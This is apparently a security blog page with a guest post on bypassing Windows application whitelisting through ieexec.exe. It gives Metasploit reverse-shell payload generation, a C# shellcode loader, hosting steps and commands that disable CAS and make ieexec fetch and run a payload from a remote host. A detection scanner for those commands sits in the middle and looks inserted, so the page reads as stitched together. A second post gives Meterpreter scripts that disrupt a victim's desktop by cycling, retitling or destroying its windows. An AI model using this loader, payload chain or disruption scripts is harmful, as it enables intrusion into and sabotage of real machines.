backoffice.microsoft.com. 3600    IN  A   64.4.11.37
backoffice.microsoft.com. 3600    IN  A   65.55.58.201

Application Whitelist Bypass Using IEexec.exe


Guest post by @infosecsmith2

There was a recent presentation at DerbyCon, entitled:

Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation by Christopher Campbell & Matthew Graeber

I highly recommend that you start with this presentation as it lays the foundation for this post.

The premise is, how can we maintain persistence in a corporate environment, using tools and defaults provided by the host OS we have compromised. This is a very important concept, given the shift in many organizations to an Application Whitelisting Defense model.

It is only a matter of time before you encounter an Application Whitelisting Defense.

As a follow up to that presentation, I began exploring the binaries that ship by default with Windows. That is where I stumbled across a binary in the C:\Windows\Microsoft.NET\Framework64\v2.0.50727 path.

The Executable is ieexec.exe. A write up is here: http://support.microsoft.com/kb/822485

“The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.”

Excellent! So now we just need to host our malicious binary and call it from ieexec.exe.

This is great, since most Application Whitelisting Environments are going to “Trust” anything signed by Microsoft as a matter of convenience. IEexec.exe will download and execute our code for us, all under the trusted process.

So let’s get started!

Step 1. Prepare your Shellcode, or whatever malicious app you want. I compiled my executable using SharpDevelop, since it has less footprint than a full blown Visual Studio install. From msfconsole:

msf > use windows/x64/shell/reverse_tcp
msf payload(reverse_tcp) > set LHOST x.x.x.x
msf payload(reverse_tcp) > set LPORT 443
msf payload(reverse_tcp) > generate -t csharp
byte[] buf = new byte[422] { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...

 <Snipped Full ShellCode for Brevity>

Step 2. Create the .NET wrapper application

using System;
using System.Runtime.InteropServices;
namespace native
{
    class Program
    {
            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            private static UInt32 MEM_RELEASE = 0x8000;

        public static void Main(string[] args)
        {
            // native function's compiled code 

            byte[] proc = new byte[] {
                0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...

            //Edited ShellCode For Brevity 
            };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // prepare data 

            PROCESSOR_INFO info = new PROCESSOR_INFO();
            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));
            Marshal.StructureToPtr(info, pinfo, false);

            // execute native code 

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            // retrieve data

            info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));
            Marshal.FreeHGlobal(pinfo);
            CloseHandle(hThread);
            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);
        }

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );

        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds );

        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle( string moduleName );

        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress( IntPtr hModule, string procName );

        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary( string lpFileName );

        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
        
        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESSOR_INFO
        {
            public UInt32 dwMax;
            public UInt32 id0;
            public UInt32 id1;
            public UInt32 id2;
            public UInt32 dwStandard;
            public UInt32 dwFeature;

            // if AMD 
            public UInt32 dwExt;
        }
    }
}

You will want to compile the exe for the target platform. In this case I am going for an x64 target. Also, you will want to compile for the 2.0 or 3.5 Framework.

Step 3. Host the Exe. For this example, I used Mongoose. Simple and Effective:

http://code.google.com/p/mongoose/

By default Mongoose listens on port 8080. This is configurable. Simply place your compiled binary from step 2 into the same directory as Mongoose. Start Mongoose and you are almost ready to deliver your payload.

Step 4. Setup your receiver:

msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set PAYLOAD windows/x64/shell/reverse_tcp
msf exploit(handler) > exploit -j

Step 5. From the host that is protected via Whitelisting, open 2 Command Prompts as administrator.

CMD 1 Execute:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s off

CMD 2 Execute:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>ieexec.exe http://x.x.x.x:8080/bypass.exe

There is some detail to unpack here as to why we need to run caspol.exe, which I can go over later. Here’s the behavior I saw in our experimentation with this.

Initial attempt to run our rogue binary fails, since it is unknown/untrusted/unapproved:

Now, on the same host…

Executes just fine!

It’s important to distinguish what this technique is and what it is not. This is not an exploit or vulnerability. Rather, this is one way to execute arbitrary code in an Application Whitelisting Environment.

Summary:

In this document we learned that even if a host is in a mode where only trusted, approved applications can run, IEExec.exe can be used in certain situations to circumvent a Whitelist, since it is likely a trusted binary because it is signed by Microsoft.
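The two command lines shown above (caspol.exe -s off followed by ieexec.exe fetching an exe over HTTP) are also exactly what a defender can key on. What follows is an added example, not code from the original post or from @infosecsmith2: a small Python scanner over process-creation events in the shape of Sysmon Event ID 1 / Security 4688 fields (Image, CommandLine, ParentImage) that flags each command line on its own and escalates when both appear on the same host within a short window. The events, host names and the 203.0.113.10 address are constructed sample data standing in for the post’s x.x.x.x; port 8080 and bypass.exe are the values the post uses.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Constructed sample process-creation events (fields mirror Sysmon Event ID 1 /
# Security 4688). 203.0.113.10 is a documentation address standing in for the
# post's x.x.x.x; hosts WS01..WS03 and timestamps are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 100,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\caspol.exe",
     "CommandLine": "caspol.exe -s off",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS01", "ts": 130,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe",
     "CommandLine": "ieexec.exe http://203.0.113.10:8080/bypass.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS02", "ts": 140,
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"host": "WS03", "ts": 150,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\caspol.exe",
     "CommandLine": "caspol.exe -security on",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


@dataclass(frozen=True)
class Finding:
    host: str
    ts: int
    rule: str
    severity: str
    command_line: str


# Per-event rules. caspol accepts -s or -security to toggle CAS enforcement;
# ieexec.exe takes the URL of the managed executable it should launch.
RULES = [
    ("caspol_security_off", "medium",
     re.compile(r"\bcaspol(\.exe)?\b.*\s-(s|security)\s+off\b", re.I)),
    ("ieexec_remote_url", "high",
     re.compile(r"\bieexec(\.exe)?\b.*\bhttps?://", re.I)),
]

CHAIN_RULE = "ieexec_whitelist_bypass_chain"


def match_event(event: Dict) -> List[Finding]:
    """Apply the per-event rules to one process-creation record."""
    cmd = event.get("CommandLine", "")
    return [Finding(event["host"], event["ts"], name, sev, cmd)
            for name, sev, rx in RULES if rx.search(cmd)]


def scan(events: Iterable[Dict], window: int = 300) -> List[Finding]:
    """Flag individual events, then correlate per host: caspol -s off followed
    by ieexec fetching a remote exe within `window` seconds is escalated."""
    findings: List[Finding] = []
    for ev in sorted(events, key=lambda e: (e["host"], e["ts"])):
        findings.extend(match_event(ev))

    per_host: Dict[str, List[Finding]] = {}
    for f in findings:
        per_host.setdefault(f.host, []).append(f)

    chained: List[Finding] = []
    for host, hits in per_host.items():
        caspol_hits = [h for h in hits if h.rule == "caspol_security_off"]
        ieexec_hits = [h for h in hits if h.rule == "ieexec_remote_url"]
        for c in caspol_hits:
            for i in ieexec_hits:
                # Only the order the post describes: caspol first, then ieexec.
                if 0 <= i.ts - c.ts <= window:
                    chained.append(Finding(host, i.ts, CHAIN_RULE, "critical",
                                           i.command_line))
    return findings + chained


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.host} t={f.ts} {f.rule}: {f.command_line}")
```

caspol.exe -s off on its own is something an administrator may legitimately run, which is why it stays at medium; the chained finding is the one worth paging on. The same two command-line patterns translate directly into whitelisting or EDR rules: a policy that trusts ieexec.exe because it is Microsoft-signed is trusting a binary whose whole purpose is to launch another executable from a URL, so it belongs with the other signed launchers that a whitelist has to constrain rather than allow outright.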

Cheers,

=> @infosecsmith2

ExtAPI Pranks

Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write-up on it, and more of the amazing things he did, in his “3 months of Meterpreter” post and on the Metasploit blog.

Just scratching the surface, and to help people see the power of this new functionality, I went ahead and created a few Meterpreter scripts that can really mess with someone.

The 1st is a script that loops through all of the windows for the current user and sets the focus to each of them in rotation, essentially making their machine unusable.

# Code loops around each of the windows
# that the current user has open and switches
# focus to each of them in rotation... 100 times.

(0..100).each do |x|
  windows = client.extapi.window.enumerate
  windows.each do |winder|
    if winder[:title] != 'Default IME'
      result = client.railgun.user32.SetForegroundWindow(winder[:handle])
    end
  end
  print_status("Round #{x}")
end

The 2nd just sets all of the windows’ titles to say “Hacked”:

windows = client.extapi.window.enumerate
windows.each do |winder|
  if winder[:title] != 'Default IME'
    result = client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked")
  end
end

And finally, if you close all of the windows in Windows, including “invisible” ones like Explorer, you will essentially make the machine unusable.

# Note: user32 CloseWindow minimizes (iconizes) the window;
# it does not destroy it.
windows = client.extapi.window.enumerate
windows.each do |winder|
  result = client.railgun.user32.CloseWindow(winder[:handle])
end

OJ suggested a few other options:

Destroy:

windows = client.extapi.window.enumerate
windows.each do |winder|
  result = client.railgun.user32.DestroyWindow(winder[:handle])
end

or Minimize all:

windows = client.extapi.window.enumerate
windows.each do |winder|
  # 6 = SW_MINIMIZE
  result = client.railgun.user32.ShowWindow(winder[:handle], 6)
end

That’s it for now. Next up we will do a few things with services as well as the clipboard. Stay tuned!